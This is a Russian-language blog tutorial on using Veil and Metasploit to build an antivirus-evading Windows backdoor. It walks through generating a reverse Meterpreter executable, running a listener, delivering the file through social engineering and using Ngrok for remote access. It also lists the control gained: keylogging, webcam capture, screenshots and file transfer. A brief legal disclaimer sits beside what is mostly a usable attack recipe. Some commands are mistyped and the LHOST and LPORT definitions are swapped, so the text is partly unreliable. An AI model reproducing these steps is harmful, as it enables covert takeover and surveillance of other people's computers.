Как создать вирус для Windows с помощью Veil на Kali Linux
Работа с различными вредоносными файлами — это область в которой должны разбираться этичные хакеры. Мы уже много раз рассказывали об инструментах создания вирусов для различных операционных систем. В этой статье продолжим изучать тему малвари и рассмотрим еще один способ создания вируса бэкдор с помощью инструмента Veil на Kali Linux (или любом другом дистрибутиве Linux).
Как создать вирус для Windows с помощью Veil на Kali Linux
Вирус бэкдор (троян, rat) — это вредоносное ПО, цель которого — скрытое подключение, получение информации и манипуляция удаленным компьютером.
Далее покажу, как я создал вирус бэкдор для своего компьютера Windows, запуск и работу которого не смог обнаружить даже антивирус. После запуска вируса я смог удаленно управлять компьютером, делать снимки с вебки, скрины, использовать кейлоггер и т. д.
Рассмотрим шаги для создания вируса.
Статья написана в образовательных целях, для обучения этичных хакеров. При демонстрации работы, были использованы наши собственные устройства. Использование подобных инструментов на чужих устройствах без надлежащего письменного разрешения, является незаконным и будет расцениваться, как уголовное преступление. Ни редакция spy-soft.net, ни автор не несут ответственность за ваши действия.
Установка Veil на Linux
Первым шагом будет установка Veil. Если вы используете отличный от Kali Linux дистрибутив, тогда нужно также установить Metasploit.
Для быстрой и тихой установки Veil на Kali Linux:
apt -y install veil /usr/share/veil/config/setup.sh --force --silent
Использование фреймворка Veil
После установки для запуска фреймворка, используем команду:
veil
Фреймворк Veil состоит из двух инструментов Evasion и Ordinance, которые можно отобразить командой:
list
Нас интересует Evasion, поэтому вводим:
vuse 1
Создание исполняемого файла вируса
В вирусах типа бэкдор создается обратное соединение. Когда целевой пользователь запускает вредоносный файл вируса, компьютер пытается соединиться с компьютером хакера. Этот процесс называется «бэкконнект». Атака идет изнутри, поэтому антивирусы не всегда могут обнаружить подобную атаку. По этой причине лучше использовать порт 8080 — это обычным порт используемый для подключения к сайтам.
Для отображения списка полезных нагрузок (вирусов), используем команду:
list
Я буду использовать 15-й вариант. Эта опция в качестве языка программирования полезной нагрузки Meterpreter использует golang:
use 15
Для создания вируса нужно задать параметры LPORT и LHOST.
- LPORT — IP-адрес атакующего компьютера. Чтобы узнать свой IP-адрес, используйте команду ifconfig.
- LHOST — порт для подключения. Я буду использовать 8080, но вы можете выбрать другой порт.
set LHOST ваш_ip set LPORT 8080
Сигнатурный анализ антивируса основан на поиске в файлах уникальной последовательности байтов — сигнатуры, характерной для определенного вируса. Для каждого нового вируса определяется его сигнатура. Полученные данные помещают в базу данных вирусных сигнатур, с которой работают все антивирусы.
Если сигнатура вашего вредоносного файла присутствует в этой базе, антивирус пометит ваш файл как подозрительный. Поэтому рекомендуется использовать обновленную версию Veil, так как обновленная версия лучше справится с маскировкой вируса и позволит обойти антивирус.
Следующие настройки я использовал для обхода антивируса. Это не обязательная часть, но лишняя защита вредоноса не помешает.
Для создания вируса выполняем команду:
generate
Дайте имя файлу. Я назвал его backdoor_8080, но в реальном пентесте, чтобы он не вызывал подозрений, вы должны назвать его иначе.
Созданный вирус будет сохранен в каталоге:
var/lib/veil/output/compiled/
Подключение к удаленному компьютеру
Теперь запустим фреймворк Metasploit. Чтобы запустить Metasploit, откройте терминал и выполните команду:
vmsfconsole
Выбираем модуль multi/handler:
use exploit/multi/handler
show options
Изменим параметры в соответствии с нашими требованиями. Выполним следующие команды:
set PAYLAOD windows/meterpreter/reverse_https set LHOST IP set LPORT 8080 show options
IP — это IP-адрес нашего компьютера, который мы использовали во время создания вируса.
exploit
Доставка вируса на целевой компьютер
Теперь можно отправить вирус на целевой компьютер. Если у вас есть нет физического доступа к устройству, тогда можете применить методы социальной инженерии. Имейте в виду — это незаконно, если у вас нет письменного разрешения на проведение пентеста.
Тестирование вируса на Windows
Запускаем вирус на компьютере Windows (в моем случае — файл backdoor_8080.exe).
Возвращаемся в Metasploit и видим, что открыта сессия metepreter. А значит мы взломали удаленный компьютер и можем с ним взаимодействовать.
Сессия Meterpreter будет выглядеть так, как показано выше. Чтобы получить справку по командам, введите:
help
Теперь можно изменять привилегии пользователя, скачивать и заливать файлы, запускать исполняемый файл как службу, делать снимки экрана, сохранять нажатия клавиш и многое другое.
Данный способ можно использовать в локальной сети. Если вы хотите использовать удаленно, тогда необходимо настроить удаленное соединение с помощью Ngrok.
Заключение
Многие думают, что создание вирусов — это что-то неправильное и им занимаются только злодеи, это не совсем так. Вирусы часто используются этичными хакерами для тестирования на проникновение. Надеюсь, что вы будете правильно использовать созданные вирусы. Не забывайте: «Чем больше сила, тем больше и ответственность»!